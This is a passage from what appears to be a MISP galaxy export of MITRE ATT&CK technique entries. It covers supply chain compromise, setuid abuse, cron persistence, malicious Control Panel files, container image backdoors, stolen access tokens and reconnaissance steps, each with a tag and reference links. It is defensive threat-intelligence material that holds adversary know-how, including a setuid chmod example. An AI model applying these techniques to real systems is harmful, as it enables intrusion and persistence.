https://www.cobaltstrike.com/help-browser-pivoting
https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses
https://cobaltstrike.com/downloads/csmanual38.pdf

Supply Chain Compromise - T1195

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

Manipulation of development tools
Manipulation of a development environment
Manipulation of source code repositories (public or private)
Manipulation of source code in open-source dependencies
Manipulation of software update/distribution mechanisms
Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware)
Replacement of legitimate software with modified versions
Sales of modified/counterfeit products to legitimate distributors
Shipment interdiction

While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195"

Table 3565. Table References
Links
https://attack.mitre.org/techniques/T1195
https://capec.mitre.org/data/definitions/437.html
https://capec.mitre.org/data/definitions/438.html
https://capec.mitre.org/data/definitions/439.html
https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028--OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206--E[https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028--OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206--E]
https://www.se.com/ww/en/download/document/SESN-2018-236-01/
https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities
https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/
https://www.commandfive.com/papers/C5_APT_SKHack.pdf
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Setuid and Setgid - T1166

When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.

An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).

The tag is: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166"

View relationships graph

Setuid and Setgid - T1166 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001" with estimative-language:likelihood-probability="almost-certain"

Table 3566. Table References
Links
https://attack.mitre.org/techniques/T1166
http://man7.org/linux/man-pages/man2/setuid.2.html
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Local Job Scheduling - T1168

On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).

cron

System-wide cron jobs are installed by modifying <code>/etc/crontab</code> file, <code>/etc/cron.d/</code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.

Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.

at

The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.

launchd

Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called <code>StartCalendarInterval</code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.

The tag is: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168"

View relationships graph

Local Job Scheduling - T1168 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 3567. Table References
Links
https://attack.mitre.org/techniques/T1168
https://linux.die.net/man/5/crontab
https://linux.die.net/man/1/at
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html
http://www.thesafemac.com/new-signed-malware-called-janicab/
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

Control Panel Items - T1196

Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)

For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)

Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196"

View relationships graph

Control Panel Items - T1196 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002" with estimative-language:likelihood-probability="almost-certain"

Table 3568. Table References
Links
https://attack.mitre.org/techniques/T1196
https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx
https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/
https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

C2 protocol development - T1352

Command and Control (C2 or C&C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="C2 protocol development - T1352"

Table 3569. Table References
Links
https://attack.mitre.org/techniques/T1352

Compiled HTML File - T1223

Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223"

View relationships graph

Compiled HTML File - T1223 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"

Table 3570. Table References
Links
https://attack.mitre.org/techniques/T1223
https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk
https://msdn.microsoft.com/windows/desktop/ms644670
https://msdn.microsoft.com/windows/desktop/ms524405
https://msitpros.com/?p=3909
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

Create implementation plan - T1232

Implementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)

The tag is: misp-galaxy:mitre-attack-pattern="Create implementation plan - T1232"

Table 3571. Table References
Links
https://attack.mitre.org/techniques/T1232

Determine operational element - T1242

If going from strategic down to tactical or vice versa, an adversary would next consider the operational element. For example, the specific company within an industry or agency within a government. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine operational element - T1242"

Table 3572. Table References
Links
https://attack.mitre.org/techniques/T1242

Identify gap areas - T1225

Leadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)

The tag is: misp-galaxy:mitre-attack-pattern="Identify gap areas - T1225"

Table 3573. Table References
Links
https://attack.mitre.org/techniques/T1225

Map network topology - T1252

A network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)

The tag is: misp-galaxy:mitre-attack-pattern="Map network topology - T1252"

Table 3574. Table References
Links
https://attack.mitre.org/techniques/T1252

Enumerate client configurations - T1262

Client configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)

The tag is: misp-galaxy:mitre-attack-pattern="Enumerate client configurations - T1262"

Table 3575. Table References
Links
https://attack.mitre.org/techniques/T1262

Identify business relationships - T1272

Business relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272"

View relationships graph

Identify business relationships - T1272 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283" with estimative-language:likelihood-probability="almost-certain"

Table 3576. Table References
Links
https://attack.mitre.org/techniques/T1272

Determine physical locations - T1282

Physical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine physical locations - T1282"

Table 3577. Table References
Links
https://attack.mitre.org/techniques/T1282

Test signature detection - T1292

An adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don’t publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection - T1292"

Table 3578. Table References
Links
https://attack.mitre.org/techniques/T1292

Access Contact List - T1432

An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432"

Table 3579. Table References
Links
https://attack.mitre.org/techniques/T1432
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Network Service Scanning - T1423

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device’s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1423"

Table 3580. Table References
Links
https://attack.mitre.org/techniques/T1423

Evade Analysis Environment - T1523

Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. Adversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access android.os.SystemProperties via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)

The tag is: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"

Table 3581. Table References
Links
https://attack.mitre.org/techniques/T1523
https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html
https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html
http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/
https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/
https://github.com/strazzere/anti-emulator
https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/

Conduct passive scanning - T1253

Passive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct passive scanning - T1253"

Table 3582. Table References
Links
https://attack.mitre.org/techniques/T1253

Fast Flux DNS - T1325

This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).

A technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)

The tag is: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1325"

Table 3583. Table References
Links
https://attack.mitre.org/techniques/T1325
https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref
https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

Domain registration hijacking - T1326

Domain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)

The tag is: misp-galaxy:mitre-attack-pattern="Domain registration hijacking - T1326"

Table 3584. Table References
Links
https://attack.mitre.org/techniques/T1326
https://www.icann.org/groups/ssac/documents/sac-007-en

Mine social media - T1273

An adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Mine social media - T1273"

Table 3585. Table References
Links
https://attack.mitre.org/techniques/T1273

Buy domain name - T1328

Domain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)

The tag is: misp-galaxy:mitre-attack-pattern="Buy domain name - T1328"

Table 3586. Table References
Links
https://attack.mitre.org/techniques/T1328

Identify business relationships - T1283

Business relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283"

View relationships graph

Identify business relationships - T1283 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272" with estimative-language:likelihood-probability="almost-certain"

Table 3587. Table References
Links
https://attack.mitre.org/techniques/T1283

Fake Developer Accounts - T1442

An adversary could use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. For example, Oberheide and Miller describe use of this technique in (Citation: Oberheide-Bouncer).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Fake Developer Accounts - T1442"

View relationships graph

Fake Developer Accounts - T1442 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 3588. Table References
Links
https://attack.mitre.org/techniques/T1442

Conduct active scanning - T1254

Active scanning is the act of sending transmissions to end nodes, and analyzing the responses, in order to identify information about the communications system. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct active scanning - T1254"

Table 3589. Table References
Links
https://attack.mitre.org/techniques/T1254

System Information Discovery - T1426

An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.

On Android, much of this information is programmatically accessible to applications through the android.os.Build class.(Citation: Android-Build)

On iOS, techniques exist for applications to programmatically access this information.(Citation: StackOverflow-iOSVersion)

The tag is: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"

Table 3590. Table References
Links
https://attack.mitre.org/techniques/T1426
https://developer.android.com/reference/android/os/Build
http://stackoverflow.com/questions/7848766/how-can-we-programmatically-detect-which-ios-version-is-device-running-on

Identify supply chains - T1246

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246"

View relationships graph

Identify supply chains - T1246 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"

Table 3591. Table References
Links
https://attack.mitre.org/techniques/T1246

Domain Trust Discovery - T1482

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"

Table 3592. Table References
Links
https://attack.mitre.org/techniques/T1482
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)
https://adsecurity.org/?p=1588
http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/
https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/
https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships

Exploit Enterprise Resources - T1428

Adversaries may attempt to exploit enterprise servers, workstations, or other resources over the network. This technique may take advantage of the mobile device’s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Enterprise Resources - T1428"

Table 3593. Table References
Links
https://attack.mitre.org/techniques/T1428
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html

Conduct social engineering - T1249

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249"

View relationships graph

Conduct social engineering - T1249 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279" with estimative-language:likelihood-probability="almost-certain"

Table 3594. Table References
Links
https://attack.mitre.org/techniques/T1249

Stored Data Manipulation - T1492

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492"

View relationships graph

Stored Data Manipulation - T1492 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"

Table 3595. Table References
Links
https://attack.mitre.org/techniques/T1492
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/press-release/file/1092091/download

Implant Internal Image - T1525

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525"

Table 3596. Table References
Links
https://attack.mitre.org/techniques/T1525
https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/
https://github.com/RhinoSecurityLabs/ccat

Cloud Service Discovery - T1526

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)

Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526"

Table 3597. Table References
Links
https://attack.mitre.org/techniques/T1526
https://docs.microsoft.com/en-us/rest/api/resources/
https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview
https://github.com/Azure/Stormspotter
https://github.com/RhinoSecurityLabs/pacu

Identify supply chains - T1265

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265"

View relationships graph

Identify supply chains - T1265 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246" with estimative-language:likelihood-probability="almost-certain"

Table 3598. Table References
Links
https://attack.mitre.org/techniques/T1265

Application Access Token - T1527

Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527"

View relationships graph

Application Access Token - T1527 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

Table 3599. Table References
Links
https://attack.mitre.org/techniques/T1527
https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

Determine firmware version - T1258

Firmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)

The tag is: misp-galaxy:mitre-attack-pattern="Determine firmware version - T1258"

Table 3600. Table References
Links
https://attack.mitre.org/techniques/T1258

Identify supply chains - T1276

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276"

View relationships graph

Identify supply chains - T1276 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"

Table 3601. Table References
Links
https://attack.mitre.org/techniques/T1276

Conduct social engineering - T1268

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268"

View relationships graph

Conduct social engineering - T1268 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

Table 3602. Table References
Links
https://attack.mitre.org/techniques/T1268

Assess targeting options - T1296

An adversary may assess a target’s operational security (OPSEC) practices in order to identify targeting options. A target may share different information in different settings or be more of less cautious in different environments. (Citation: Scasny2015) (Citation: EverstineAirStrikes)

The tag is: misp-galaxy:mitre-attack-pattern="Assess targeting options - T1296"

Table 3603. Table References
Links
https://attack.mitre.org/techniques/T1296

Analyze data collected - T1287

An adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the confirmation or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze data collected - T1287"

Table 3604. Table References
Links
https://attack.mitre.org/techniques/T1287

Conduct social engineering - T1279

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1279"

View relationships graph

Conduct social engineering - T1279 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"
related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249" with estimative-language:likelihood-probability="almost-certain"

Table 3605. Table References
Links
https://attack.mitre.org/techniques/T1279

Access Call Log - T1433

On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.

On iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433"

Table 3606. Table References
Links
https://attack.mitre.org/techniques/T1433
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Create backup infrastructure - T1339

Backup infrastructure allows an adversary to recover from environmental and system failures. It also facilitates recovery or movement to other infrastructure if the primary infrastructure is discovered or otherwise is no longer viable. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Create backup infrastructure - T1339"

Table 3607. Table References
Links
https://attack.mitre.org/techniques/T1339

Remotely Install Application - T1443

